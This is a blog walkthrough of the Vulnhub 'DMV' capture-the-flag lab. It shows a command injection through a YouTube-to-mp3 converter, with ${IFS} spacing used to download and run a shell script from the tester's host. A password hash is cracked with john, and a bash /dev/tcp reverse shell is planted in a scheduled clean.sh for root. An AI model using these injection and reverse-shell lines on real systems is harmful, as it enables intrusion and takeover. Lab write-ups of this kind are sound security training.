Vulnhub – DMV Walkthrough

We start by scanning the host witn nmap –A –T4 –p- 192.168.1.5 –vv

Then i used dirb http://192.168.1.5

We have this page where you convert a Youtbe link to mp3:

Well every time we put a link nothing happen, but let’s use BurpSuite to see what’s going on in the background:

We have this output, i played around but trying different commands and scripts instead of the YouTube link:

I searched for “WARNING: Assuming –restrict-filenames” and i got couple of links, linke1 and link2 and all i had to do is try to upload a shell with different methods till i got one to work,  i used this ${IFS} to compensate for the Space between the letters:

First i made the shell with  msfvenome 

Then i edited the shell script:

From cd /tmp; wget http://192.168.1.13:80/shell.sh; chmod 777 shell.sh; ./shell.sh

To cd${IFS}/tmp;${IFS}wget${IFS}http://192.168.1.13:80/shell.sh;${IFS}chmod${IFS}777${IFS}shell.sh;${IFS}./shell.sh

Start a SimpleHTTPServer on our machine and a nc listening port:

After that there is a folder admin inside it the flag and the .htpasswd

We’re going to use john to decrypt the password for this one, john –wordlist=/root/pass/rockyou.txt hashfile and the password is Jessie now we need to know where to use it.

I was searching for any hidden files ls -alhR /var/www/ and i came to find this one clean.sh it’s a file to remove the files from inside download folder:

All we have to do is just modify the file like this bash -i >& /dev/tcp/192.168.1.13/3333 0>&1 and wait for the file to run and we will get a shell back to our listening port in this case it’s 3333 and then we root and catch the flag:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s